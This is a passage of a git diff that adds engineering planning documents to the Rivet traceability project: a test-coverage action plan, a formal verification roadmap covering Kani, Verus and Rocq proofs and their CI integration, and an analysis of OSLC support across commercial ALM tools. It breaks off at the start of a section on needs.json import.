+| rivet-core/tests/mutate_integration.rs | 8 tests | REQ-031 |
+
+**Total:** ~63 test functions need markers for ~11 distinct REQs.
+
+### Lifecycle Coverage Gaps to Close
+
+44 approved artifacts are missing downstream links (from `rivet validate`):
+
+**Requirements missing aadl-component allocation (8):**
+REQ-012, REQ-013, REQ-014, REQ-015, REQ-016, REQ-017, REQ-018, REQ-019
+
+**Features missing design-decision links (5):**
+FEAT-001, FEAT-002, FEAT-009, FEAT-010, FEAT-018
+
+**Features with no downstream artifacts at all (28):**
+All TEST-* and many FEAT-* approved artifacts — these are leaf nodes
+(test artifacts and features) that by nature have no further downstream.
+Consider adding a lifecycle rule exemption for `feature` artifacts with
+tags containing `testing` or `swe-*`.
+
+### Validation Warnings to Fix
+
+| Artifact | Issue | Fix |
+|----------|-------|-----|
+| FEAT-050 | `phase: phase-4` not in allowed values | Add `phase-4` to allowed values in dev.yaml, or change to `future` |
+| FEAT-051 | `phase: phase-4` not in allowed values | Same fix |
+
+---
+
+## Priority Action Plan
+
+### Immediate (this sprint)
+
+1. Fix FEAT-050/051 phase value warnings
+2. 
Add 8 loss scenarios for UCA-C-10 through UCA-C-17 +3. Add `// rivet: verifies` markers to top 3 test files (~30 tests) +4. Ensure all Phase 3 commits use artifact trailers + +### Short-term (next sprint) + +5. Add H-13/H-14/H-15 hazards and associated SC/UCA/CC/LS artifacts +6. Add SC-3 through SC-10 `satisfies` links from requirements +7. Add remaining test markers (~33 tests) +8. Consider STPA artifact exemption from commit coverage denominator + +### Medium-term (Phase 3) + +9. Implement FEAT-043 (test traceability source scanner) to automate marker extraction +10. Implement FEAT-029 (commit-msg-check) to prevent future orphan commits +11. Add missing DD links for FEAT-001, FEAT-002, FEAT-009, FEAT-010, FEAT-018 +12. Add lifecycle rule exemptions for leaf-node test features + +--- + +## Artifact Count Summary + +| Category | Existing | New Needed | Total After | +|----------|----------|-----------|-------------| +| Losses | 6 | 0 | 6 | +| Hazards | 12 | 3 | 15 | +| Sub-hazards | 10 | 0 | 10 | +| System constraints | 14 | 3 | 17 | +| UCAs | 45 | 3 | 48 | +| Controller constraints | 45 | 3 | 48 | +| Loss scenarios | 19 | 11 | 30 | +| **STPA total** | **151** | **23** | **174** | +| Requirements | 31 | 0 | 31 | +| Design decisions | 28 | 0 | 28 | +| Features | 67 | 0 | 67 | +| AADL components | 21 | 0 | 21 | +| **Grand total** | **328** | **23** | **351** | diff --git a/docs/plans/2026-03-16-formal-verification-completion.md b/docs/plans/2026-03-16-formal-verification-completion.md new file mode 100644 index 0000000..b7766d8 --- /dev/null +++ b/docs/plans/2026-03-16-formal-verification-completion.md @@ -0,0 +1,303 @@ +# Formal Verification Completion Plan + +**Issue:** #23 — Formal verification strategy (Kani + Verus + Rocq) +**Date:** 2026-03-16 +**Status:** Analysis complete, ready for execution + +--- + +## 1. 
Current State + +### 1.1 Kani (Bounded Model Checking) — 10 harnesses, ready for CI + +**File:** `rivet-core/src/proofs.rs` (gated behind `#[cfg(kani)]`) + +| # | Harness | Property proved | +|---|---------|-----------------| +| 1 | `proof_parse_artifact_ref_no_panic` | `parse_artifact_ref` never panics for any printable ASCII input up to 8 bytes | +| 2 | `proof_store_insert_no_panic` | `Store::insert` never panics for any bounded artifact | +| 3 | `proof_store_duplicate_returns_error` | Duplicate insert returns `Err`, store length stays 1 | +| 4 | `proof_coverage_percentage_bounds` | `CoverageEntry::percentage()` always in [0.0, 100.0]; edge cases at 0 and total=0 | +| 5 | `proof_cardinality_exhaustive` | `validate()` handles all `Cardinality` variants without panic for 0-2 links | +| 6 | `proof_compute_coverage_report_bounds` | End-to-end `compute_coverage` yields covered <= total, percentage in [0, 100] | +| 7 | `proof_schema_merge_idempotent` | `Schema::merge` with duplicate file preserves type/link/inverse counts | +| 8 | `proof_linkgraph_lone_artifact_is_orphan` | Unlinked artifact detected as orphan | +| 9 | `proof_linkgraph_dag_no_cycles` | A->B->C chain has no cycles | +| 10 | `proof_linkgraph_cycle_detected` | A->B->A cycle is correctly detected | + +**Integration status:** Module is declared in `lib.rs` (`#[cfg(kani)] mod proofs;`), `Cargo.toml` declares `cfg(kani)` in `unexpected_cfgs`. CI has a commented-out Kani job (lines 229-236 of `.github/workflows/ci.yml`). + +**Verdict: READY to uncomment and ship.** The `kani-github-action@v1` installs Kani automatically. No Bazel needed. 
+ +### 1.2 Verus (SMT-backed functional correctness) — 6 specs, 3 proved + +**File:** `rivet-core/src/verus_specs.rs` (gated behind `#[cfg(verus)]`) + +| # | Spec/Proof | Status | +|---|-----------|--------| +| 1 | `store_well_formed` spec + `lemma_insert_preserves_wellformed` | **Proved** — inserting a fresh ID preserves store well-formedness | +| 2 | `backlink_symmetric` spec + `lemma_build_yields_symmetric` | **Proved** (from preconditions) — forward/backward link symmetry | +| 3 | `coverage_bounded` spec + `lemma_coverage_bounded` | **Proved** — coverage percentage in [0, 100] using vstd arithmetic lemmas | +| 4 | `validation_soundness` | **Spec only** — stated as open spec function, NOT proved. States: no errors implies all types known, no broken links, backlinks symmetric | +| 5 | `reachable_sound` + `reachable_complete` | **Spec only** — defines reachability with fuel-bounded induction, NOT proved | +| 6 | `coverage_validation_agreement` | **Spec only** — 100% coverage implies no error diagnostics for that rule, NOT proved | + +**Integration status:** `verus/BUILD.bazel` defines `verus_library` and `verus_test` targets. `verus/MODULE.bazel` references `pulseengine/rules_verus` (commit `e2c1600`). Requires Bazel 8+ and a nightly Rust toolchain (1.82.0-nightly pinned by Verus). + +**Verdict: NOT runnable in CI today.** Requires Bazel infrastructure and rules_verus to be published/available. The 3 unproved specs need substantial proof work. 
+ +### 1.3 Rocq (Deep metamodel proofs) — 24 Qed, 1 Admitted + +**Files:** `proofs/rocq/Schema.v` (667 lines), `proofs/rocq/Validation.v` (201 lines) + +#### Schema.v — 17 Qed, 1 Admitted + +| # | Theorem/Lemma | Status | +|---|--------------|--------| +| 1 | `schema_satisfiable` | **Proved** — empty store satisfies any rule set | +| 2 | `monotonicity_non_source` | **Proved** — adding non-source artifact preserves validity | +| 3 | `validation_empty_store` | **Proved** — zero work for empty store | +| 4 | `validation_empty_rules` | **Proved** — zero work for empty rule set | +| 5 | `validation_work_add_one` | **Proved** — adding one artifact adds |rules| work | +| 6 | `store_get_not_in` | **Proved** — lookup returns None if ID not present | +| 7 | `store_get_in` | **Proved** — lookup succeeds for present ID in unique store | +| 8 | `broken_link_detection_sound` | **Proved** — absent target means link is broken | +| 9 | `store_get_app_new` | **Proved** — newly appended artifact is retrievable | +| 10 | `insert_then_get` | **Proved** — insert then get returns the artifact | +| 11 | `store_get_app_old` | **Proved** — insert preserves old lookups | +| 12 | `insert_preserves_old` | **Proved** — insert doesn't affect other artifact retrieval | +| 13 | `insert_duplicate_fails` | **Proved** — duplicate ID insert returns None | +| 14 | `backlink_from_forward_link` | **Proved** — forward link induces backlink | +| 15 | `vmodel_chain_two_steps` | **Proved** — two consecutive rules imply reachability | +| 16 | `single_rule_constructible` | **Proved** — any single rule is satisfiable | +| 17 | `no_source_no_violations` | **Proved** — no source artifacts means zero violations | +| 18 | `zero_violations_implies_satisfied` | **ADMITTED** — requires inductive reasoning over `filter` | + +#### Validation.v — 7 Qed, 0 Admitted + +| # | Theorem/Lemma | Status | +|---|--------------|--------| +| 1 | `validation_deterministic` | **Proved** — pure function, reflexivity | +| 2 | 
`empty_store_no_diagnostics` | **Proved** — empty store yields empty diagnostics |
+| 3 | `check_broken_links_reports` | **Proved** — broken link always produces SevError diagnostic |
+| 4 | `check_broken_links_clean` | **Proved** — all targets present means no broken-link diags |
+| 5 | `check_artifact_rule_clean` | **Proved** — non-matching artifact kind means no rule diag |
+| 6 | `check_broken_links_length` | **Proved** — broken-link diags bounded by link count |
+| 7 | `check_artifact_rules_length` | **Proved** — rule diags bounded by rule count |
+
+**Totals: 24 proved (Qed), 1 admitted.**
+
+**Integration status:** `proofs/rocq/BUILD.bazel` defines targets using `rules_rocq_rust`. `proofs/rocq/MODULE.bazel` references `pulseengine/rules_rocq_rust` (commit `6a8da0b`) and requires Nix + Bazel 8+ for hermetic Rocq 9.0 toolchain.
+
+**Verdict: NOT runnable in CI today.** Requires Bazel + Nix infrastructure. One admitted theorem needs completion.
+
+---
+
+## 2. Gap Analysis
+
+### 2.1 What's proved vs what's spec'd but not proved
+
+| Layer | Proved | Spec'd only | Admitted | Total |
+|-------|--------|-------------|----------|-------|
+| Kani | 10 harnesses (all complete) | 0 | 0 | 10 |
+| Verus | 3 lemmas | 3 specs (validation_soundness, reachability, coverage-validation agreement) | 0 | 6 |
+| Rocq | 24 theorems | 0 | 1 (zero_violations_implies_satisfied) | 25 |
+| **Total** | **37** | **3** | **1** | **41** |
+
+### 2.2 What's missing from Issue #23 scope
+
+Issue #23 calls for proofs of:
+
+| Desired proof | Current status |
+|--------------|----------------|
+| `LinkGraph::build()` no panics | **Partially covered** — Kani #5, #8-10 exercise build indirectly, but no dedicated harness for arbitrary store+schema |
+| `parse_artifact_ref()` all inputs | **Done** — Kani #1 |
+| `Schema::merge()` never panics, preserves types | **Partially covered** — Kani #7 proves idempotence only; no explicit panic-freedom harness |
+| `validate()` cardinality logic exhaustive | **Done** — Kani #5 
| +| `detect_circular_deps()` DFS terminates, finds all cycles | **Partially covered** — Kani #9, #10 test DAG/cycle but not DFS termination | +| MODULE.bazel parser all inputs | **Not started** — no Kani harness for Bazel parser | +| Validation soundness (PASS -> rules satisfied) | **Spec only** — Verus spec #4, not proved | +| Validation completeness (violated -> diagnostic) | **Partially covered** — Rocq `zero_violations_implies_satisfied` is ADMITTED | +| Backlink symmetry | **Done** — Verus #2 proved, Rocq #14 proved | +| Conditional rule consistency | **Not started** | +| Reachability correctness | **Spec only** — Verus #5 | +| Schema satisfiability | **Done** — Rocq #1 | +| Monotonicity | **Done** — Rocq #2 | +| Link graph well-foundedness / validation terminates | **Done** — Rocq #3-5 | +| ASPICE V-model completeness | **Partially covered** — Rocq #15 (two-step chain) | + +### 2.3 CI integration gaps + +| Tool | CI status | Blocker | +|------|-----------|---------| +| Kani | **Commented out** in ci.yml (lines 229-236) | None — just uncomment | +| Verus | No CI job | Requires Bazel + rules_verus + nightly Rust 1.82.0 | +| Rocq | No CI job | Requires Bazel + rules_rocq_rust + Nix + Rocq 9.0 | + +--- + +## 3. CI Integration Plan + +### 3.1 Kani — Immediate (uncomment existing job) + +The ci.yml already has a commented-out Kani job at lines 229-236: + +```yaml +kani: + name: Kani Proofs + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v6 + - uses: model-checking/kani-github-action@v1 + - run: cargo kani -p rivet-core +``` + +**Action:** Uncomment. The `kani-github-action@v1` handles installation. `cargo kani -p rivet-core` runs all 10 harnesses. Estimated CI time: 5-15 minutes depending on solver performance. 
+ +**Considerations:** +- Pin `kani-version` for reproducibility (e.g., `kani-version: '0.50.0'`) +- Add `continue-on-error: false` to block PRs on proof failure +- Consider caching: Kani compiles CBMC which is slow on first run; the action caches internally + +### 3.2 Verus — Medium-term (requires Bazel in CI) + +Two paths: + +**Path A: Bazel in CI (preferred)** +- Add a Bazel CI job that runs `bazel test //verus:rivet_specs_verify` +- Requires: `rules_verus` published, Bazel 8+ on runner, ~10 min setup +- Blocked on: `pulseengine/rules_verus` being a real, working Bazel module + +**Path B: Direct Verus invocation (workaround)** +- Install Verus nightly binary in CI +- Run `verus rivet-core/src/verus_specs.rs` directly +- Problem: the file uses `use crate::...` imports that won't resolve outside cargo + +**Recommendation:** Path A. Park until Bazel is adopted for the project. + +### 3.3 Rocq — Medium-term (requires Bazel + Nix in CI) + +**Path A: Bazel + Nix in CI (preferred)** +- Add a Bazel CI job: `bazel test //proofs/rocq:rivet_metamodel_test` +- Requires: `rules_rocq_rust` published, Nix on runner, Bazel 8+ +- Estimated CI time: 2-5 minutes (Rocq proofs compile fast) + +**Path B: Direct coqc invocation (workaround)** +- Install Rocq/Coq 9.0 via Nix or apt +- Run `coqc -Q proofs/rocq Rivet proofs/rocq/Schema.v proofs/rocq/Validation.v` +- Simpler but non-hermetic + +**Path C: Nix-only CI job (intermediate)** +```yaml +rocq: + name: Rocq Proofs + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v6 + - uses: cachix/install-nix-action@v27 + - run: | + nix-env -iA nixpkgs.coq + coqc -Q proofs/rocq Rivet proofs/rocq/Schema.v + coqc -Q proofs/rocq Rivet proofs/rocq/Validation.v +``` + +**Recommendation:** Path C as an immediate step, Path A when Bazel is adopted. + +--- + +## 4. 
Prioritized New Proofs to Add + +### Priority 1 — High value, low effort (next sprint) + +| # | Proof | Tool | Rationale | +|---|-------|------|-----------| +| 1 | `proof_linkgraph_build_no_panic` — arbitrary store+schema | Kani | Issue #23 explicitly calls for this; exercises the core graph builder | +| 2 | `proof_schema_merge_no_panic` — arbitrary schema files | Kani | Dedicated panic-freedom proof (current #7 only tests idempotence) | +| 3 | `proof_validate_no_panic` — arbitrary store+schema+graph | Kani | Most critical: validate is the safety-critical function | +| 4 | Complete `zero_violations_implies_satisfied` | Rocq | The only Admitted theorem; requires inductive filter reasoning | +| 5 | Uncomment Kani CI job | CI | Zero-cost, immediate value | + +### Priority 2 — Medium effort, high value (next month) + +| # | Proof | Tool | Rationale | +|---|-------|------|-----------| +| 6 | `proof_detect_cycles_terminates` — DFS terminates for any graph | Kani | Issue #23 scope; verify `has_cycles` terminates | +| 7 | Prove `validation_soundness` | Verus | The highest-value proof: PASS means all rules satisfied | +| 8 | Prove `reachable_sound` + `reachable_complete` | Verus | Reachability correctness for transitive closure | +| 9 | ASPICE full V-model chain (N steps, not just 2) | Rocq | Extend `vmodel_chain_two_steps` to arbitrary chains | +| 10 | Rocq CI job (Path C: Nix-based) | CI | Proves Rocq proofs compile on every PR | + +### Priority 3 — Higher effort, strategic value (quarter) + +| # | Proof | Tool | Rationale | +|---|-------|------|-----------| +| 11 | Prove `coverage_validation_agreement` | Verus | 100% coverage implies no error diags | +| 12 | Conditional rule consistency | Verus | No contradictions when rules co-fire | +| 13 | MODULE.bazel parser panic-freedom | Kani | Issue #23 scope; lower priority since not safety-critical path | +| 14 | Verus CI via Bazel | CI | Requires Bazel adoption | +| 15 | `coq-of-rust` extraction | Rocq | Auto-extract Rocq 
model from Rust source; experimental | + +--- + +## 5. Timeline Estimate + +| Phase | Duration | Deliverables | +|-------|----------|-------------| +| **Week 1** (immediate) | 1-2 days | Uncomment Kani CI job; add 3 new Kani harnesses (#1-3 above) | +| **Week 2** | 3-5 days | Complete Rocq admitted theorem (#4); add Rocq Nix CI job (#10) | +| **Weeks 3-4** | 1-2 weeks | Kani cycle-termination proof (#6); begin Verus validation_soundness proof (#7) | +| **Month 2** | 2-3 weeks | Complete Verus reachability proofs (#8); ASPICE full chain (#9) | +| **Month 3** | 2-3 weeks | Verus coverage-validation agreement (#11); conditional rules (#12); Bazel CI (#14) | + +**Total estimated effort:** ~6-8 weeks of focused formal verification work. + +--- + +## 6. Can We Run Kani Right Now? + +**In CI: YES.** Uncomment lines 229-236 in `.github/workflows/ci.yml`. The `kani-github-action@v1` handles all installation. The 10 harnesses are self-contained and compile correctly under `#[cfg(kani)]`. + +**Locally: Requires installation.** Kani is not installed on this machine. Install via: +```bash +cargo install --locked kani-verifier +cargo kani setup +cargo kani -p rivet-core +``` + +**Expected outcome:** All 10 harnesses should pass. The harnesses use small bounds (8 bytes, 4 chars, 3 artifacts) to keep solver time manageable. + +--- + +## 7. rules_verus and rules_rocq_rust Integration Status + +### rules_verus (`verus/MODULE.bazel`) +- **Source:** `pulseengine/rules_verus` (GitHub) +- **Commit:** `e2c1600a8cca4c0deb78c5fcb4a33f1da2273d29` +- **Verus version:** `0.2026.02.15` +- **Requirements:** Bazel 8+, Rust nightly (1.82.0, pinned by Verus) +- **Status:** BUILD.bazel and MODULE.bazel are written. Depends on `rules_verus` being a functional Bazel module (may need real implementation work in the `pulseengine/rules_verus` repo). 
+ +### rules_rocq_rust (`proofs/rocq/MODULE.bazel`) +- **Source:** `pulseengine/rules_rocq_rust` (GitHub) +- **Commit:** `6a8da0bd30b5f80f811acefbf6ac5740a08d4a8c` +- **Rocq version:** 9.0 via Nix +- **Requirements:** Bazel 8+, Nix package manager, `rules_nixpkgs_core` 0.13.0 +- **Status:** BUILD.bazel and MODULE.bazel are written. Depends on `rules_rocq_rust` being a functional Bazel module. The Nix dependency adds complexity but ensures hermetic toolchains. + +**Neither Bazel module is likely functional today** — both reference `pulseengine/rules_*` repos that may be stubs or works-in-progress. The Rocq proofs can be verified independently with plain `coqc`; the Verus specs need the Verus toolchain but could potentially be verified with a standalone Verus binary. + +--- + +## 8. Summary Scorecard + +| Metric | Value | +|--------|-------| +| Kani harnesses | 10 (all complete) | +| Verus specs | 6 (3 proved, 3 spec-only) | +| Rocq theorems | 25 (24 Qed, 1 Admitted) | +| **Total proved** | **37** | +| **Total spec'd but not proved** | **4** | +| CI integration | Kani ready (commented out), Verus/Rocq blocked on Bazel | +| Lowest-hanging fruit | Uncomment Kani CI job (5-minute task) | +| Biggest gap | Verus `validation_soundness` — the most important proof, not yet attempted | +| ISO 26262 readiness | Strong foundation; need validation soundness proof for TCL 1 argument | diff --git a/docs/plans/2026-03-16-oslc-analysis.md b/docs/plans/2026-03-16-oslc-analysis.md new file mode 100644 index 0000000..2c783ed --- /dev/null +++ b/docs/plans/2026-03-16-oslc-analysis.md @@ -0,0 +1,490 @@ +# OSLC Ecosystem Analysis and Strategic Recommendation + +**Date:** 2026-03-16 +**Artifacts:** REQ-006, FEAT-011, DD-001 +**Status:** Research complete, recommendation pending decision + +--- + +## 1. 
What Rivet's OSLC Module Already Implements + +The existing implementation in `rivet-core/src/oslc.rs` (~1870 lines) is a +well-structured OSLC client that covers the core protocol mechanics. Feature-gated +behind `#[cfg(feature = "oslc")]` to isolate the `reqwest` dependency. + +### Implemented (working, tested) + +| Capability | Status | Evidence | +|---|---|---| +| Service Provider Catalog discovery | Complete | `OslcClient::discover()`, wiremock test | +| OSLC Query with `oslc.where` / `oslc.select` | Complete | `OslcClient::query()`, wiremock test | +| Pagination support (next_page parsing) | Partial | Response struct supports it, no auto-follow | +| GET single resource (JSON-LD) | Complete | `OslcClient::get_resource()`, wiremock test | +| POST to creation factory | Complete | `OslcClient::create_resource()`, wiremock test | +| PUT to update resource | Complete | `OslcClient::update_resource()`, wiremock test | +| Basic auth | Complete | `with_basic_auth()`, wiremock test | +| Bearer token auth | Complete | `with_bearer_token()`, wiremock test | +| RM domain types (Requirement) | Complete | `OslcRequirement` struct, full serde | +| QM domain types (TestCase, TestResult) | Complete | `OslcTestCase`, `OslcTestResult` structs | +| CM domain types (ChangeRequest) | Complete | `OslcChangeRequest` struct | +| OSLC-to-Artifact mapping | Complete | `oslc_to_artifact()`, 6 link types mapped | +| Artifact-to-OSLC mapping | Complete | `artifact_to_oslc()`, bidirectional | +| Sync diff computation | Complete | `compute_diff()` with remote/local/modified/unchanged | +| SyncAdapter trait (pull/push/diff) | Complete | `OslcSyncAdapter` implements trait | +| Pull (query -> artifacts) | Complete | Tested with mixed resource types | +| Push (artifacts -> create) | Basic | Always POSTs; no create-vs-update logic | +| Error handling (HTTP codes, malformed JSON) | Complete | 404, 500, malformed JSON/catalog tests | +| JSON-LD @type dispatching | Complete | 
`parse_member_resource()` with fallback | + +### Not Implemented (gaps for real-world use) + +| Gap | Severity | Notes | +|---|---|---| +| DELETE resource | Minor | Not needed for most sync workflows | +| TRS (Tracked Resource Set) | Major | Required for incremental sync; currently full-pull only | +| OAuth 1.0a (Jazz Form Auth) | **Critical** | IBM ELM uses Jazz form-based auth + OAuth 1.0a, not Basic/Bearer | +| OAuth 2.0 / OIDC | **Critical** | Modern Polarion/codebeamer may require OIDC | +| Resource Shapes validation | Medium | No shape discovery or constraint checking | +| ETag / If-Match concurrency | Medium | No optimistic concurrency control on PUT | +| Pagination auto-follow | Minor | `next_page` is parsed but not auto-followed | +| Delegated Dialogs | Low | Only needed for embedded UI (not Rivet's pattern) | +| OSLC-Core-Version 3.0 header | Minor | Currently sends "2.0"; should be configurable | +| Configuration Management (versions/baselines) | Major | No OSLC Config support for versioned resources | +| ASPICE type mapping | **Critical** | Only maps 4 generic types; no mapping for ASPICE's 14 types | +| Push with diff-based create/update | Medium | Push always creates; no update-existing logic | +| Rate limiting / retry | Minor | No backoff or retry on transient failures | +| RDF/XML content type | Medium | Only JSON-LD; codebeamer requires `application/rdf+xml` | + +--- + +## 2. OSLC Core 3.0 Specification Requirements + +OSLC Core 3.0 (OASIS Standard, August 2021) is an 8-part multi-part specification. +It was designed for backward compatibility with OSLC 2.0 -- most 2.0 servers remain +3.0 compliant without changes. 
+ +### Parts of the Specification + +| Part | Title | Client relevance | +|---|---|---| +| 1 | Overview | Architecture guidance | +| 2 | Discovery | **Required** -- catalog, service providers | +| 3 | Resource Preview | Optional -- compact rendering for UI | +| 4 | Delegated Dialogs | Optional -- embedded creation/selection UI | +| 5 | Attachments | Optional -- binary file handling | +| 6 | Resource Shape | **Important** -- server resource validation | +| 7 | Vocabulary | **Required** -- common terms (dcterms, oslc) | +| 8 | Constraints | Machine-readable shapes | + +### What a Conformant Client MUST Do + +1. Preserve unknown properties between GET and PUT (Rivet's `extra: BTreeMap` field + does this correctly for typed resources, but `serde(flatten)` may drop nested + JSON-LD constructs) +2. Send `OSLC-Core-Version: 2.0` header (currently implemented correctly) +3. Support content negotiation for at least one RDF format + +### What a Conformant Server MUST Do (not Rivet's concern as a client) + +1. Support GET returning RDF +2. Return OSLC-Core-Version header +3. Implement OSLC Core vocabulary + +### Domain Specifications (OASIS Standards) + +| Domain | Version | Key resources | +|---|---|---| +| Requirements Management (RM) | 2.1 | Requirement, RequirementCollection | +| Quality Management (QM) | 2.1 | TestCase, TestResult, TestPlan, TestExecutionRecord | +| Change Management (CM) | 3.0 | ChangeRequest | +| Architecture Management (AM) | 3.0 | Resource (generic) | +| Configuration Management | 1.0 | Versions, baselines, change sets | +| Tracked Resource Set (TRS) | 3.0 | Base + ChangeLog for incremental sync | + +### TRS (Tracked Resource Set) -- Key for Incremental Sync + +TRS is the mechanism for change tracking without polling individual resources. 
+A TRS provides: +- **Base**: point-in-time enumeration of all tracked resources (LDP Container) +- **Change Log**: ordered series of creation/modification/deletion events +- **Cutoff**: point in the change log already reflected in the base + +A client reads the Base initially, then polls the Change Log for deltas. +This is conceptually similar to git fetch -- get the full state once, +then apply incremental changes. + +**Assessment**: TRS is essential for production OSLC sync but adds significant +complexity. Without TRS, Rivet must do full-pull-and-diff on every sync, +which is acceptable for small/medium artifact sets (< 10,000) but not for +large enterprise deployments. + +--- + +## 3. Real ALM Tools and Their Actual OSLC Support + +### IBM DOORS Next (ELM) -- The Gold Standard + +**OSLC support: Deep, native, original** + +DOORS Next is the reference OSLC implementation. IBM created OSLC. + +- **Domains**: RM (native provider), QM consumer, CM consumer +- **OSLC version**: 2.0 with some 3.0 extensions +- **Auth**: Jazz Form-based auth + OAuth 1.0a (not Basic Auth). + Modern versions support OIDC (OpenID Connect). + The authentication flow is complex: GET protected resource -> receive + `X-com-ibm-team-repository-web-auth-msg: authrequired` header -> + POST credentials to `/j_security_check` -> follow redirects -> get JSESSIONID. + This is significantly more complex than Basic/Bearer auth. +- **TRS**: Supported. IBM uses TRS extensively for cross-tool integration + within the ELM suite. +- **Config Management**: Supported (global configurations, baselines). +- **Practical notes**: DOORS Next is the most OSLC-capable tool, but its + authentication mechanism is the most complex. Many OSLC client libraries + exist for Java (Eclipse Lyo) but very few for Rust/non-Java languages. + Module-level operations (document structure) are not fully exposed via OSLC. 
+ +### Siemens Polarion -- Partial, Growing + +**OSLC support: Partial native, supplemented by OSLC Connect** + +- **Domains**: RM (native), CM (native). **QM not natively supported** -- + requires manual admin configuration to add QM semantics. +- **OSLC version**: 2.0 / partial 3.0 +- **Auth**: Basic Auth or token-based auth. More straightforward than Jazz. +- **REST API**: Polarion has a rich proprietary REST API (actively developed, + version 2512 current) that is more capable than its OSLC endpoint for + many operations. The REST API covers gaps that OSLC does not. +- **OSLC Connect**: Third-party product (SodiusWillert) that provides enhanced + OSLC integration for Polarion, including linking to Jira, DOORS, etc. + This suggests Polarion's native OSLC is not sufficient for cross-tool + integration without middleware. +- **ReqIF**: Fully supported for import/export. +- **Practical notes**: For Polarion integration, the proprietary REST API + is more practical than OSLC for most use cases. OSLC is primarily used + for cross-tool linking with IBM ELM, not as the primary integration method. + +### PTC codebeamer -- Partial, Evolving + +**OSLC support: Provider and consumer, RM and CM domains** + +- **Domains**: RM (provider/consumer), CM (provider/consumer). + QM integration with IBM ETM added in codebeamer 3.1 (August 2025). +- **OSLC version**: 3.0 header required (`OSLC-Core-version: 3.0`) +- **Content type**: Requires `application/rdf+xml` (not JSON-LD!). + This is a significant incompatibility with Rivet's current JSON-LD-only client. +- **Auth**: Basic Auth supported. +- **OSLC usage**: Primarily for linking with Windchill PLM and IBM ELM. + Not the primary integration API for standalone use. +- **ReqIF**: Supported since codebeamer 7.6.0 for interchange with DOORS. +- **REST API**: codebeamer has a comprehensive proprietary REST API that + is the primary integration method for most customers. 
+- **Practical notes**: codebeamer's OSLC is focused on PLM-to-ALM linking + (PTC ecosystem integration), not on general-purpose data sync. + +### Jama Connect -- External Adapter Only + +**OSLC support: Not native. Requires third-party adapter.** + +- **No native OSLC**: Jama does not implement OSLC natively. +- **OSLC adapter**: Available via Koneksys (oslc-adapter-jama on GitHub), + which wraps Jama's REST API as an OSLC provider. This adapter supports + RM domain and OAuth 1.0a but is a community/third-party project. +- **OSLC Model Connector**: Partnership with MiD/Smartfacts provides + MBSE integration via OSLC, but this is for model-to-requirements linking, + not general artifact sync. +- **REST API**: Jama has a well-documented REST API that is the primary + integration method. +- **Practical notes**: Integrating with Jama via OSLC requires running a + separate adapter service. Direct REST API integration is more practical. + +### Summary: Actual OSLC Implementation Reality + +| Tool | Native OSLC | RM | QM | CM | TRS | Auth Method | Primary API | +|---|---|---|---|---|---|---|---| +| DOORS Next | Yes (deep) | Yes | Yes | Yes | Yes | Jazz OAuth 1.0a / OIDC | OSLC | +| Polarion | Partial | Yes | No* | Yes | No | Basic / Token | Proprietary REST | +| codebeamer | Partial | Yes | Partial | Yes | No | Basic | Proprietary REST | +| Jama Connect | No | Adapter | No | No | No | OAuth 1.0a (adapter) | Proprietary REST | + +*\* QM requires admin-level semantic configuration* + +**Key finding**: Only IBM DOORS Next uses OSLC as its primary integration API. +Polarion, codebeamer, and Jama all have proprietary REST APIs that are more +capable, better documented, and more widely used than their OSLC endpoints. + +--- + +## 4. 
The ASPICE Type Mapping Problem + +Rivet's OSLC module maps only 4 generic OSLC types: + +| OSLC Type | Rivet artifact type | +|---|---| +| oslc_rm:Requirement | requirement | +| oslc_qm:TestCase | test-case | +| oslc_qm:TestResult | test-result | +| oslc_cm:ChangeRequest | change-request | + +But ASPICE v4.0 defines 14 artifact types that Rivet tracks: + +| ASPICE Type | ASPICE Process | OSLC Mapping? | +|---|---|---| +| stakeholder-req | SYS.1 | oslc_rm:Requirement (lossy) | +| system-req | SYS.2 | oslc_rm:Requirement (lossy) | +| system-arch-component | SYS.3 | No OSLC equivalent | +| sw-req | SWE.1 | oslc_rm:Requirement (lossy) | +| sw-arch-component | SWE.2 | No OSLC equivalent | +| sw-detail-design | SWE.3 | No OSLC equivalent | +| unit-verification | SWE.4 | oslc_qm:TestCase (lossy) | +| sw-integration-verification | SWE.5 | oslc_qm:TestCase (lossy) | +| sw-verification | SWE.6 | oslc_qm:TestCase (lossy) | +| sys-integration-verification | SYS.4 | oslc_qm:TestCase (lossy) | +| sys-verification | SYS.5 | oslc_qm:TestCase (lossy) | +| verification-execution | -- | oslc_qm:TestResult (partial) | +| verification-verdict | -- | oslc_qm:TestResult (partial) | + +**Fundamental problem**: OSLC's 4 resource types cannot represent ASPICE's +14-type V-model without information loss. The `aspice-process` field, +`method` field (automated-test, review, formal-verification, etc.), and the +detailed link types (derives-from, allocated-from, refines, verifies, +result-of, part-of-execution) have no OSLC-standard representation. + +Workaround options: +1. Use `dcterms:type` or custom RDF properties to carry ASPICE type info + (non-standard, tool-specific) +2. Map everything to generic Requirement/TestCase and lose type granularity +3. Use ReqIF instead, which preserves arbitrary attribute schemas + +--- + +## 5. Eclipse SCORE and the Competitive Context + +Eclipse SCORE (Safe Open Vehicle Core) is the primary adoption target for Rivet. 
+ +**SCORE's tooling approach**: +- **Documentation**: Sphinx + sphinx-needs (docs-as-code) +- **Requirements format**: `needs.json` (sphinx-needs export format) +- **Metamodel**: 50+ need types defined in `metamodel.yaml` +- **No OSLC usage**: SCORE does not use OSLC for tool synchronization +- **No ReqIF usage**: SCORE uses `needs.json` as its interchange format +- **Version control**: Git-based, plain text files + +**Implication for Rivet**: The SCORE adoption opportunity (the strategic priority +per Rivet's roadmap) requires `needs.json` import (already implemented), not OSLC. +SCORE projects will not have Polarion or DOORS to sync with -- they use +sphinx-needs and git. + +--- + +## 6. Alternative Approaches + +### A. ReqIF Interchange (Already Implemented) + +Rivet already has a working ReqIF 1.2 adapter (`rivet-core/src/reqif.rs`). + +**Strengths**: +- Universal support: DOORS, Polarion, codebeamer all import/export ReqIF +- File-based: works across organizational boundaries (no server access needed) +- Preserves arbitrary attributes via ReqIF SPEC-OBJECT-TYPE/ATTRIBUTE +- Git-friendly when stored as XML files +- OMG standard with strong automotive industry adoption +- No authentication complexity + +**Weaknesses**: +- Not real-time; requires explicit export/import cycles +- No incremental sync (full document exchange) +- XML verbosity +- Tool-specific attribute mapping still needed + +**Assessment**: ReqIF is the proven interchange format for cross-company +requirements exchange in automotive. Every major ALM tool supports it. It is +the right format for "send requirements to supplier / receive from customer" +workflows, which is the dominant integration pattern in ASPICE processes. + +### B. needs.json Import 